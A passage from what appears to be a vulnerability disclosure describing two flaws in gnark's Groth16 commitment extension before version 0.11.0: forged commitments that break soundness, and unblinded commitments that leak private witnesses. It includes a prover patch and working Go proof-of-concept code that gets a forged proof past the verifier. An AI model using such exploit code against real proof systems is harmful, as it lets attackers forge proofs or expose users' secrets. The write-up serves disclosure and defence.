What does this mean in practice? Say there are kk commitments as usual, and the correctly computed points would be D1correct,,DkcorrectD_1^{\mathrm{correct}}, \dots, D_k^{\mathrm{correct}}. Then the malicious prover could use D1fake,,DkfakeD_1^{\mathrm{fake}}, \dots, D_k^{\mathrm{fake}} as commitments, where, for example, all but one of them (say all but DkfakeD_k^{\mathrm{fake}}) are set to 0G10 \in \mathbb{G}_1, with the remaining commitment carrying the contributions missing from the others as well (so Dkfake=i=1kDicorrectD_k^{\mathrm{fake}} = \sum_{i=1}^{k} D_i^{\mathrm{correct}}). Now for i<ki<k, the challenge point H(Difake)\mathcal{H}(D_i^{\mathrm{fake}}) obtained in circuit from the commitment to circuit variables aja_j for jJij\in \mathcal{J}_i does not actually depend on the assignments to any circuit variables anymore but stays fixed. But for most uses of such challenge points, such as when compressing checks using the Schwartz-Zippel lemma, the in-circuit logic will not be sound anymore if the challenge point is not obtained from a random function of the committed-to circuit variables.

We emphasize that this issue only occurs when more than one commitment is used. The most likely way a circuit uses commitments will be the range checks from the standard library, which can use them internally, should the backend support commitments. However, commitments for range checks are used via the multicommit package, which only creates a single commitment. Thus, circuits using commitments purely through range checks or otherwise through multicommit will not be vulnerable, as only a single commitment is used.

Proof of Concept

To demonstrate the issue that we just discussed, we produced a proof of concept. In it, we construct a cicuit with two private witnesses, to which we assign random values. We commit individually to both private witnesses, producing two commitments and in-circuit challenges c1c_1 and c2c_2 corresponding to those commitments. We use the fungibility between the commitments to produce a proof with D1fake=0D_1^{\mathrm{fake}} = 0 and D2fake=D1correct+D2correctD_2^{\mathrm{fake}} = D_1^{\mathrm{correct}} + D_2^{\mathrm{correct}}. Like this, no matter what we assign to the two private witnesses, the first challenge c1c_1 will always be a constant, the hash of the zero point.

As the commitments are calculated in the gnark library (rather than being passed to it as an argument), we need to patch the prover part of gnark to produce our malicious proofs. This is done with the following patch, based on version 0.10.0:

diff --git a/backend/groth16/bn254/prove.go b/backend/groth16/bn254/prove.go
index 100f30e8..1cf93b96 100644
--- a/backend/groth16/bn254/prove.go
+++ b/backend/groth16/bn254/prove.go
@@ -60,7 +60,7 @@ func (proof *Proof) CurveID() ecc.ID {
}

// Prove generates the proof of knowledge of a r1cs with full witness (secret + public part).
-func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...backend.ProverOption) (*Proof, error) {
+func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, fakeCommitments []curve.G1Affine, opts ...backend.ProverOption) (*Proof, error) {
opt, err := backend.NewProverConfig(opts...)
if err != nil {
return nil, fmt.Errorf("new prover config: %w", err)
@@ -91,10 +91,7 @@ func Prove(r1cs *cs.R1CS, pk *ProvingKey, fullWitness witness.Witness, opts ...b
privateCommittedValues[i][j].SetBigInt(inJ)
}

- var err error
- if proof.Commitments[i], err = pk.CommitmentKeys[i].Commit(privateCommittedValues[i]); err != nil {
- return err
- }
+ proof.Commitments[i] = fakeCommitments[i]

opt.HashToFieldFn.Write(constraint.SerializeCommitment(proof.Commitments[i].Marshal(), hashed, (fr.Bits-1)/8+1))
hashBts := opt.HashToFieldFn.Sum(nil)
diff --git a/backend/groth16/groth16.go b/backend/groth16/groth16.go
index ca5b8bdc..36f3d459 100644
--- a/backend/groth16/groth16.go
+++ b/backend/groth16/groth16.go
@@ -179,7 +179,8 @@ func Prove(r1cs constraint.ConstraintSystem, pk ProvingKey, fullWitness witness.
if icicle_bn254.HasIcicle {
return icicle_bn254.Prove(_r1cs, pk.(*icicle_bn254.ProvingKey), fullWitness, opts...)
}
- return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)
+ panic("changed stuff for poc")
+ //return groth16_bn254.Prove(_r1cs, pk.(*groth16_bn254.ProvingKey), fullWitness, opts...)

case *cs_bw6761.R1CS:
return groth16_bw6761.Prove(_r1cs, pk.(*groth16_bw6761.ProvingKey), fullWitness, opts...)

The patch only makes a very small change: the Groth16 prover for the bn254 elliptic curve takes one extra argument, fakeCommitments, and instead of calculating the commitments, it just uses the ones that were passed with fakeCommitments. Because the signature of the Prove function was changed, we also need to fix one other place of the codebase to make it compile (the generic Prove function for Groth16, without specializing to concrete types for a specific curve).

By using a patched version of gnark as above, the following code then demonstrates the issue:

package main

import (
"crypto/sha256"
"fmt"
"log"
"math/big"
"math/rand"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark-crypto/ecc/bn254/fr"
"github.com/consensys/gnark-crypto/ecc/bn254/fr/hash_to_field"
fiatshamir "github.com/consensys/gnark-crypto/fiat-shamir"
"github.com/consensys/gnark/backend"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/constraint"
cs_bn254 "github.com/consensys/gnark/constraint/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
)

// Our circuit has two private witnesses
type Circuit struct {
A frontend.Variable
B frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}

// We commit to both A and B separately, obtaining two challenges.
challenge_A, err := commitCompiler.Commit(circuit.A)
if err != nil {
return err
}
challenge_B, err := commitCompiler.Commit(circuit.B)
if err != nil {
return err
}

// To have some constraints involving the private witnesses and challenges, we constraint them to be nonzero.
api.AssertIsDifferent(challenge_A, 0)
api.AssertIsDifferent(challenge_B, 0)
api.AssertIsDifferent(circuit.A, 0)
api.AssertIsDifferent(circuit.B, 0)

// The two challenges should depend on the value assigned to the respective circuit variables
// in such a way that it is impossible to change the underlying circuit variable's values
// without the corresponding challenges changing as well.
// We demonstrate that this does not hold and we can choose the circuit variable being committed to
// *after* fixing the challenge that should randomly depend on it, by constraining
// the challenge to be a constant. We will still be able to prove the circuit for
// any value assigned to the circuit variables.
var hashOfZero fr.Element
var hashOfZeroBigInt big.Int
hashOfZeroBigInt.SetString("14057090015281774264105022686285549399478565317353443989948588114876049265504", 10)
hashOfZero.SetBigInt(&hashOfZeroBigInt)
fmt.Println("Constraining the challange based on the commitment to A to be the hash of zero: ", hashOfZero.String())
api.AssertIsEqual(challenge_A, hashOfZero)

return nil
}

func main() {
// Setup circuit
var circ Circuit
ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
if err != nil {
panic(err)
}

// Assigning some random values.
A := *big.NewInt(rand.Int63())
B := *big.NewInt(rand.Int63())
var w Circuit
w.A = A
w.B = B
fmt.Println("Assigning random value A = ", A.String())
fmt.Println("Assigning random value B = ", B.String())

// Running setup, and prover.
witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
if err != nil {
panic(err)
}
witnessPublic, err := witness.Public()
if err != nil {
panic(err)
}
pk, vk, err := groth16.Setup(ccs)
if err != nil {
panic(err)
}

// Converting proving key to concrete type
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}

// Construct fake commitment, and associated proof of knowledge.
// In this case, we make the first commitment zero.
commitments, commitmentPok := fakeCommitment(*pkConcrete, A, B, *big.NewInt(0), *big.NewInt(0))

// groth16_bn254.Prove has been modified to use our supplied commitments instead of
// calculating the legitimate ones.
fakeProof, err := groth16_bn254.Prove(ccs.(*cs_bn254.R1CS), pkConcrete, witness, commitments)
if err != nil {
panic(err)
}
// The proof of knowledge for the commitment calculated by groth16_bn254.Prove will not
// fit our fake commitments, so we replace it with the previously calculated pok.
fakeProof.CommitmentPok = commitmentPok

// groth16.Verify has not been modified, yet it accepts our proof with incorrect commitments.
err = groth16.Verify(fakeProof, vk, witnessPublic)
if err != nil {
panic(err)
}
}

// Constructs fake commitments. Only works for two commitments to one circuit variable each.
// Will fake the first commitment to be FirstCommitmentA*Base[0] + FirstCommitmentB*Base[1]
// instead of the expected AReal*Base[0]. Will also calculate the corresponding proof of knowledge.
func fakeCommitment(pk groth16_bn254.ProvingKey, AReal big.Int, BReal big.Int, FirstCommitmentA big.Int, FirstCommitmentB big.Int) ([]bn254.G1Affine, bn254.G1Affine) {
expConfig := ecc.MultiExpConfig{
NbTasks: 1,
}

// Casting values to Fr elements
var ARealFr fr.Element
var BRealFr fr.Element
var FirstCommitmentAFr fr.Element
var FirstCommitmentBFr fr.Element
ARealFr.SetBigInt(&AReal)
BRealFr.SetBigInt(&BReal)
FirstCommitmentAFr.SetBigInt(&FirstCommitmentA)
FirstCommitmentBFr.SetBigInt(&FirstCommitmentB)

// Get the commitment key basis elements
basisPointsA, err := getBasisField(&pk.CommitmentKeys[0])
if err != nil {
panic(err)
}
basisPointsB, err := getBasisField(&pk.CommitmentKeys[1])
if err != nil {
panic(err)
}

commitments := make([]bn254.G1Affine, 2)
exponents := make([]fr.Element, 2)

// commitments[0] = FCA * Base[0] + FCB * Base[1]
exponents[0] = FirstCommitmentAFr
exponents[1] = FirstCommitmentBFr
commitments[0].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
exponents[0].Sub(&ARealFr, &FirstCommitmentAFr)
exponents[1].Sub(&BRealFr, &FirstCommitmentBFr)
commitments[1].MultiExp([]bn254.G1Affine{basisPointsA[0], basisPointsB[0]}, exponents, expConfig)

//commitmentPublicInputs, commitmentsSerialized, err := getCommitmentsHashes(commitments)
_, commitmentsSerialized, err := getCommitmentsHashes(commitments)
if err != nil {
panic(err)
}
//The printout below can be used to get that constant we use in the circuit constraints
//fmt.Println("first commitment public input = ", commitmentPublicInputs[0].String())

// Get the challenge for commitment folding.
r, err := getChallenge(commitmentsSerialized)
if err != nil {
panic(err)
}

// Calculation of the proof of knowledge going along with the commitments:

// commitments[0] = FCA * Base[0] + FCB * Base[1]
// commitments[1] = (A - FCA) * Base[0] + (B - FCB) * Base[1]
// foldedCommitment = (FCA + r*(A - FCA)) * Base[0] + (FCB + r*(B - FCB)) * Base[1]

exponents[0].Mul(&exponents[0], &r)
exponents[0].Add(&exponents[0], &FirstCommitmentAFr)

exponents[1].Mul(&exponents[1], &r)
exponents[1].Add(&exponents[1], &FirstCommitmentBFr)

basisExpSigmaPointsA, err := getBasisExpSigmaField(&pk.CommitmentKeys[0])
if err != nil {
panic(err)
}
basisExpSigmaPointsB, err := getBasisExpSigmaField(&pk.CommitmentKeys[1])
if err != nil {
panic(err)
}

var pok bn254.G1Affine
pok.MultiExp([]bn254.G1Affine{basisExpSigmaPointsA[0], basisExpSigmaPointsB[0]}, exponents, expConfig)

return commitments, pok
}

// This function calculates the commitment hashes added to the public inputs,
// and calculates the commitmentsSerialized value used for calculating the challenge in commitment folding.
// The code here is mostly copied from gnark's backend/groth16/bn254/verify.go
func getCommitmentsHashes(commitments []bn254.G1Affine) ([]fr.Element, []byte, error) {
opt, err := backend.NewVerifierConfig()
if err != nil {
return nil, nil, fmt.Errorf("new verifier config: %w", err)
}
if opt.HashToFieldFn == nil {
opt.HashToFieldFn = hash_to_field.New([]byte(constraint.CommitmentDst))
}
commitmentHashesAsPublicWitnesses := make([]fr.Element, len(commitments))
commitmentsSerialized := make([]byte, len(commitments)*fr.Bytes)
commitmentPrehashSerialized := make([]byte, bn254.SizeOfG1AffineUncompressed)
for i := range len(commitments) {
copy(commitmentPrehashSerialized, commitments[i].Marshal())
opt.HashToFieldFn.Write(commitmentPrehashSerialized[:bn254.SizeOfG1AffineUncompressed])
hashBts := opt.HashToFieldFn.Sum(nil)
opt.HashToFieldFn.Reset()
nbBuf := fr.Bytes
if opt.HashToFieldFn.Size() < fr.Bytes {
nbBuf = opt.HashToFieldFn.Size()
}
var res fr.Element
res.SetBytes(hashBts[:nbBuf])
commitmentHashesAsPublicWitnesses[i] = res
copy(commitmentsSerialized[i*fr.Bytes:], res.Marshal())
}

return commitmentHashesAsPublicWitnesses, commitmentsSerialized, nil
}

// copied from gnark-crypto's source code, ecc/bn254/fr/pedersen/pedersen.go
// (it is a private function, so we can't call it)
func getChallenge(fiatshamirSeeds ...[]byte) (r fr.Element, err error) {
// incorporate user-provided seeds into the transcript
t := fiatshamir.NewTranscript(sha256.New(), "r")
for i := range fiatshamirSeeds {
if err = t.Bind("r", fiatshamirSeeds[i]); err != nil {
return
}
}

// obtain the challenge
var rBytes []byte

if rBytes, err = t.ComputeChallenge("r"); err != nil {
return
}
r.SetBytes(rBytes) // TODO @Tabaie Plonk challenge generation done the same way; replace both with hash to fr?
return
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

// Like getBasisField but for basisExpSigma
func getBasisExpSigmaField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basisExpSigma")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basisExpSigma' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

Running this program will produce output such as the following:

17:16:43 INF compiling circuit
17:16:43 INF parsed circuit inputs nbPublic=0 nbSecret=2
Constraining the challange based on the commitment to A to be the hash of zero: 14057090015281774264105022686285549399478565317353443989948588114876049265504
17:16:43 INF building constraint builder nbConstraints=5
Assigning random value A = 2593177307956940674
Assigning random value B = 228695105607157038
17:16:43 DBG constraint system solver done nbConstraints=5 took=0.239835
17:16:43 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=5 took=3.831231
17:16:43 DBG verifier done backend=groth16 curve=bn254 took=4.448234

The values assigned to the circuit variables A and B will be fresh, random values each time, but nevertheless, verification does pass for a circuit constraining the challenge based on the commitment to circuit variable A to be a specific constant.

The Fix

After we reported the above vulnerability to gnark, the protocol regarding the proof of knowledge associated to the commitments was changed to the variant using k+1k+1 pairings that we discussed above. This fix is included starting from version 0.11.0.

Commitment Schemes

There is a second vulnerability associated to the commitments as used by gnark up to version 0.10.0, related to the proof scheme’s zero-knowledge property.

But before getting into that vulnerability, let us take a step back from the particulars of Groth16 and gnark’s exension to it and discuss what it actually means to talk about commitments. A commitment scheme is a way for a committer to commit to some value in a way that binds them to it. The value should be hidden from the receiver of the commitment, but the committer should be able to open the commitment at some later time, thereby revealing the committed value and convincing the receiver that this was the value they had committed to all along. More precisely, a commitment scheme of the type relevant for us has two main phases as follows:

Commitment: The committer runs a commitment algorithm C\mathcal{C} that takes as input a value xx (from a predefined set) as well as randomness; outputs C(x)=(C,d)\mathcal{C}(x) = (C, d), consisting of a commitment CC and some extra decommitment information dd. While CC can be published, the committer will keep dd for themselves, as this is what they need to open the commitment later. In some cases, dd might not be needed.

Opening: At some later time, the committer publishes xx and dd. Other parties can now run a verification algorithm V\mathcal{V} that takes ((C,d),x)((C, d), x) as input and either accepts (returns 1) or rejects (returns 0).

The idea is that the verification algorithm should only accept ((C,d),x)((C, d), x) if xx is the value that was used as the input to the commitment algorithm that originally produced CC. Also, we don’t want it to be possible for anyone to recover xx from just CC. To be a bit more precise, we can define the following properties such a scheme might satisfy:

Completeness: The verification algorithm accepts on data produced by the commitment algorithm: V(C(x),x)=1\mathcal{V}(\mathcal{C}(x), x) = 1.

Binding: It is infeasible for an attacker to produce C,x,x,d,dC, x, x', d, d' so that V(C(x),x)=1\mathcal{V}(\mathcal{C}(x), x) = 1 and V(C(x),x)=1\mathcal{V}(\mathcal{C}(x'), x') = 1 but xxx\neq x'. The upshot of this property is that once CC is published, the only value the committer can open CC to is the one they originally used when computing CC.

Hiding: Given only CC, an attacker cannot recover the value xx committed to via CC. To be more precise, we could ask for this to be computationally infeasible (computationally hiding), but we could also ask for this to be truly impossible because for any xx there exists a dd such that CC can be opened to xx, and each xx is equally probable as long as the committer chose dd to be uniformly random (perfect hiding).

A commitment scheme that is often used is the Pedersen commitment scheme. To introduce it, let GG be an abelian group with pp elements (with pp a prime) and g1,,gn,hg_1, \dots, g_n, h nonzero elements of GG. We now describe how we can use Pedersen commitments to commit to a tuple (x1,,xn)(x_1, \dots, x_n) of elements of Fp\mathbb{F}_p.

Commitment: Given (x1,,xn)(x_1, \dots, x_n), a uniformly random element dFpd\in\mathbb{F}_p is sampled. The commitment and decommitment information is then given by C(x)=(C,d)=(dh+i=1nxigi,d)\mathcal{C}(x) = (C, d) = (d \cdot h + \sum_{i=1}^n x_i \cdot g_i, d).

Verification: The verification algorithm returns 1 if and only if the equality C=dh+i=1nxigiC = d \cdot h + \sum_{i=1}^n x_i \cdot g_i holds.

It is immediate that this scheme is complete as defined above. It is also perfectly hiding. This can be seen as follows: fix xx and consider the unformly random distribution on Fp\mathbb{F}_p for dd. If dd is uniformly random, then dhd\cdot h is uniformly random as well, as hh is nonzero and multiplication by a nonzero element in Fp\mathbb{F}_p is a bijection. Similarly, adding a constant is a bijection as well, so C=dh+i=1nxigiC = d \cdot h + \sum_{i=1}^n x_i \cdot g_i is uniformly random. In particular, the distribution of CC is the same no matter what xx was, and hence given CC, all values for xx are equally probable, as long as dd is chosen uniformly random.

How about the binding property? The answer to this depends on the group used. For example, if we used G=Z/pZG = \mathbb{Z}/p\mathbb{Z}, then this scheme would not be binding at all. Indeed, given a fixed CC, finding tuples (x1,,xn,d)(x_1, \dots, x_n,d) so that V((C,d),(x1,,xn))=1\mathcal{V}((C, d), (x_1, \dots, x_n)) = 1 amounts to solving the linear equation C=dh+i=1nxigiC = d \cdot h + \sum_{i=1}^n x_i \cdot g_i. This is easily doable; given any x1,,xnx_1, \dots, x_n we can use d=h1(Ci=1nxigi)d = h^{-1}\cdot \left(C - \sum_{i=1}^n x_i \cdot g_i\right).

The problem of solving equations of the form C=dh+i=1nxigiC = d \cdot h + \sum_{i=1}^n x_i \cdot g_i in GG for d,x1,,xnd, x_1, \dots, x_n if hh and g1,,gng_1, \dots, g_n are uniformly random elements of GG is called the discrete log (relation) problem. That the discrete log problem is hard for GG means that it is computatationally intractible to solve such equations. So the Pedersen commitment scheme is computationally binding if the discrete logarithm problem is hard in GG and hh and g1,,gng_1, \dots, g_n were chosen as independent uniformly random elements of GG. Note that h,g1,,gnh, g_1, \dots, g_n being independent and uniformly random is necessary, as it is easy to solve the given equation if, for example, h=g1==gnh=g_1=\cdots=g_n.

The Zero-Knowledge Vulnerability

Let us now get back to gnark’s extension to Groth16. We will again use the notation from before. As we discussed, the commitments that a gnark Groth16 proof might come with have the form Di=jJiajLjD_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j. The aja_j are private witnesses,2 and LjL_j are points on an elliptic curve for which the discrete logarithm problem is assumed to be hard. But are these commitments DiD_i rebinding and hiding? We will first begin with the binding property and then discuss the failure for the commitments to be hiding. The commitments not being hiding implies that the proving system does not satisfy zero knowledge, and we discuss the practical impact of this. We also discuss how the standard library’s range checks use commitments, and we provide a proof of concept in which private witnesses are recovered from range checks.

The Binding Property of the Commitments

In this subsection, we consider under which conditions the commitments may have the binding property. By the discussion in the previous section, the commitment will be computationally binding as long as the points LjL_j are independent uniformly random elements of the elliptic curve.

Before discussing under which condition this property might hold, let us first point out that, unlike the general idea of commitments, the commitments of gnark’s Groth16 extension are not intended to be opened. That the commitment is binding, as defined above, is thus actually not really that relevant.

What is more relevant is that H(Di)\mathcal{H}(D_i) acts as a random function of the assignments of the circuit variables committed to, as this is what is needed to ultimately use the hash of the commitment as a random challenge depending on the committed-to circuit variables. If we consider the case of only a single commitment, and H\mathcal{H} may be treated as a random function, then this requirement essentially boils down to the points LjL_j being indistinguishable from being independently uniformly random from the perspective of the prover as well and thus is equivalent to the commitment being binding. If there is more than one commitment, then an additional question arises whether the commitments can be treated separately or not. This is precisely what the soundness vulnerability discussed above is about.

Getting back to the binding property, the condition that the relevant LjL_j are independent and uniformly random is not satisfied in general. Roughly, if the coefficients of some circuit variables in constraints always satisfy a linear relation,3 then the associated LjL_j will also satisfy this relation.

To illustrate what we mean by this, suppose we are considering a single commitment DD to two circuit variables xx and yy, with D=xLx+yLyD = x\cdot L_x + y \cdot L_y. There may be constraints imposed such as (cx+dy)(2cx+2dy)=z(c\cdot x+d\cdot y) \cdot (2\cdot c\cdot x + 2\cdot d\cdot y) = z or cx+dy=42c\cdot x + d\cdot y = 42. The property to note here is that the coefficient for yy in each factor and in the linear term is always the same multiple dc\frac{d}{c} of the coefficient for xx. It will then hold that also Ly=dcLxL_y = \frac{d}{c}\cdot L_x. The upshot of the observation that dLx=cLyd\cdot L_x = c \cdot L_y is that the prover knows a relation dLxcLy=0d\cdot L_x - c \cdot L_y = 0, so if they originally commited to (x,y)(x, y), they may also open the commitment to (x+rd,yrc)(x + r\cdot d, y - r\cdot c) for any rFpr\in \mathbb{F}_p. Taking the point of view where H(D)\mathcal{H}(D) will be used as a random challenge depending on xx and yy, the prover has, after knowing what the challenge H(D)\mathcal{H}(D) will be, still one degree of freedom to adjust xx and yy. However, this actually does not help the malicious prover. This is because the test being performed using the challenge value (like a Schwartz-Zippel–style equality check) can only depend on cx+dyc\cdot x + d\cdot y by our assumption, and this value does not change with this adjustment!

We won’t go into detail why the above holds in general, as this will involve the details of Groth16 and its arithmetization in more depth than we cover in this article. The following example demonstrates the observation in practice, however. In it, we define a circuit with two private witnesses, which we commit together. We add constraints as above and then check that the relation dLx=cLyd\cdot L_x = c \cdot L_y indeed holds.

package main

import (
"fmt"
"log"
"math/big"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
)

const c = 5
const d = 7

type Circuit struct {
SecretWitnessX frontend.Variable
SecretWitnessY frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}

_, err := commitCompiler.Commit(circuit.SecretWitnessX, circuit.SecretWitnessY)
if err != nil {
return err
}

// We add some constraints where the ratio between the coefficients for Y and X is always d/c.
sum1 := api.Add(api.Mul(c, circuit.SecretWitnessX), api.Mul(d, circuit.SecretWitnessY))
sum2 := api.Add(api.Mul(2*c, circuit.SecretWitnessX), api.Mul(2*d, circuit.SecretWitnessY))
api.Mul(sum1, sum2)
api.AssertIsEqual(sum1, c*42+d*47)
return nil
}

func main() {
// Setup circuit
var circ Circuit
ccs, err := frontend.Compile(ecc.BN254.ScalarField(), r1cs.NewBuilder, &circ)
if err != nil {
panic(err)
}

// Assigning some values.
var w Circuit
w.SecretWitnessX = 42
w.SecretWitnessY = 47

// Running setup and prover.
witness, err := frontend.NewWitness(&w, ecc.BN254.ScalarField())
if err != nil {
panic(err)
}
witnessPublic, err := witness.Public()
if err != nil {
panic(err)
}
pk, vk, err := groth16.Setup(ccs)
if err != nil {
panic(err)
}
pkConcrete, ok := pk.(*groth16_bn254.ProvingKey)
if !ok {
log.Fatal("unexpected type for proving key")
}
proof, err := groth16.Prove(ccs, pk, witness)
if err != nil {
panic(err)
}

commitmentPk := &pkConcrete.CommitmentKeys[0]
basisFieldConcrete, err := getBasisField(commitmentPk)
if err != nil {
fmt.Println("Error:", err)
return
}

// Check the linear relation satisfied by the basis elements for the commitments
scaledBasisX := new(bn254.G1Affine)
scaledBasisX.ScalarMultiplication(&basisFieldConcrete[0], big.NewInt(d))
scaledBasisY := new(bn254.G1Affine)
scaledBasisY.ScalarMultiplication(&basisFieldConcrete[1], big.NewInt(c))
fmt.Println("d*basis[0] == c*basis[1] :", *scaledBasisX == *scaledBasisY)

err = groth16.Verify(proof, vk, witnessPublic)
if err != nil {
panic(err)
}
}

// getBasisField extracts the unexported basis field from a given ProvingKey.
// basis was renamed to Basis and thus made public in newer versions,
// however for gnark 0.10.0, a version of gnark-crypto is used in which the field was still private.
func getBasisField(commitmentPk interface{}) ([]bn254.G1Affine, error) {
// Reflect on the pointer
commitmentPkValue := reflect.ValueOf(commitmentPk)

if commitmentPkValue.Kind() != reflect.Ptr || commitmentPkValue.Elem().Kind() != reflect.Struct {
return nil, fmt.Errorf("expected a pointer to a struct")
}

// Access the 'basis' field
basisField := commitmentPkValue.Elem().FieldByName("basis")
if !basisField.IsValid() {
return nil, fmt.Errorf("field 'basis' not found")
}

if !basisField.CanInterface() {
// To access an unexported field, we need to bypass safety
basisField = reflect.NewAt(basisField.Type(), unsafe.Pointer(basisField.UnsafeAddr())).Elem()
}

basisFieldConcrete, ok := basisField.Interface().([]bn254.G1Affine)
if !ok {
return nil, fmt.Errorf("failed to type assert to []bn254.G1Affine")
}

return basisFieldConcrete, nil
}

The output will be as follows:

13:17:21 INF compiling circuit
13:17:21 INF parsed circuit inputs nbPublic=0 nbSecret=2
13:17:21 INF building constraint builder nbConstraints=2
13:17:21 DBG constraint system solver done nbConstraints=2 took=0.771787
13:17:21 DBG prover done acceleration=none backend=groth16 curve=bn254 nbConstraints=2 took=2.421542
d*basis[0] == c*basis[1] : true
13:17:21 DBG verifier done backend=groth16 curve=bn254 took=3.512609

We have now described one specific way in which the commitment is not binding or H(Di)\mathcal{H}(D_i) not a random function of the committed-to circuit variables, but we have also argued why this is not an issue in practice. This raises the question whether this is the only manner in which this property fails, so that H(Di)\mathcal{H}(D_i) satisfies the security property required of it for use as a random challenge needed in practice. The author expects that this is the case, but we have not attempted to formally define the required property and prove it.

The Hiding Property of the Commitments

In comparison with Pedersen commitments discussed before, the commitments used by gnark, being of the form Di=jJiajLjD_i = \sum_{j \in \mathcal{J}_i } a_j\cdot L_j, lack the blinding summand dhd\cdot h, which is what makes Pedersen commitments perfectly hiding. The commitments used by gnark (before version 0.11.0) were thus not hiding. What does this mean in practice?

Let us consider a single commitment D=i=1kaiLiD = \sum_{i=1}^{k} a_i \cdot L_i. Suppose the attacker, who has only access to DD and LiL_i, but not the original aia_i used to calculate DD, makes a guess for the values of aia_i, with the guessed values being aia'_i for aia_i. Then the attacker can verify whether that guess is correct by checking D=?i=1kaiLiD \stackrel{?}{=} \sum_{i=1}^k a'_i \cdot L_i. If equality holds, then either ai=aia_i = a'_i for all 1ik1 \leq i \leq k or a linear relation i=1k(aiai)Li\sum_{i=1}^k (a_i - a'_i) \cdot L_i has been found, which we assume does not occur in practice by the hardness of the discrete logarithm problem as long as L1,,LkL_1, \dots, L_k are independently uniformly random. Hence, in practice (putting aside exceptions to the binding property discussed in the previous subsection), the equality holding implies that the attacker found the original values used by the prover.

An attacker can thus use DD and L1,,LkL_1, \dots, L_k to brute-force the original values of a1,,aka_1, \dots, a_k. If the attacker has no information about what a1,,aka_1, \dots, a_k might be — in other words, from their perspective, (a1,,ak)(a_1, \dots, a_k) is a uniformly random element of Fpk\mathbb{F}_p^k — then this will be infeasible in practice, as the search space will be intractably large. However, if there is only a small number of possibilities for each a1a_1 to aka_k, then it may be feasible to search the entire search space. For example, aia_i might be a leaf in a Merkle tree, with the circuit verifying a Merkle inclusion proof and being intended to protect knowledge of which leaf was used in the proof. If the leaves are publicly known, then it might be feasible for an attacker to verify guesses for each leaf.

The failure of the commitments to be binding is related to the extended Groth16 system’s zero-knowledge property. The zero-knowledge property requires that it should be impossible to extract any knowledge about the private witnesses from the proof, except that the prover knows private witnesses that satisfy the circuit’s constraints. The just described issue implies that it is possible to extract information about those private witnesses that are involved in commitments, violating the zero-knowledge property.

The following code demonstrates this. We define a simple circuit, with a single private witness that is committed. We assign the private witness the value 42. The code then checks that the commitment that comes with the proof is indeed given by 42 times the corresponding basis element that is part of the proving key.

package main

import (
"fmt"
"log"
"math/big"
"reflect"
"unsafe"

"github.com/consensys/gnark-crypto/ecc"
"github.com/consensys/gnark-crypto/ecc/bn254"
"github.com/consensys/gnark/backend/groth16"
groth16_bn254 "github.com/consensys/gnark/backend/groth16/bn254"
"github.com/consensys/gnark/frontend"
"github.com/consensys/gnark/frontend/cs/r1cs"
)

const secret = 42

type Circuit struct {
SecretWitness frontend.Variable
}

func (circuit *Circuit) Define(api frontend.API) error {
commitCompiler, ok := api.Compiler().(frontend.Committer)
if !ok {
return fmt.Errorf("compiler does not commit")
}

commit, err := commitCompiler.Commit(circuit.SecretWitness)
if err != nil {
return err
}

api.AssertIsDifferent(commit, 0)
api.AssertIsDifferent(circuit.SecretWitness, 0)
return nil
}

func main() {
// Setup circuit
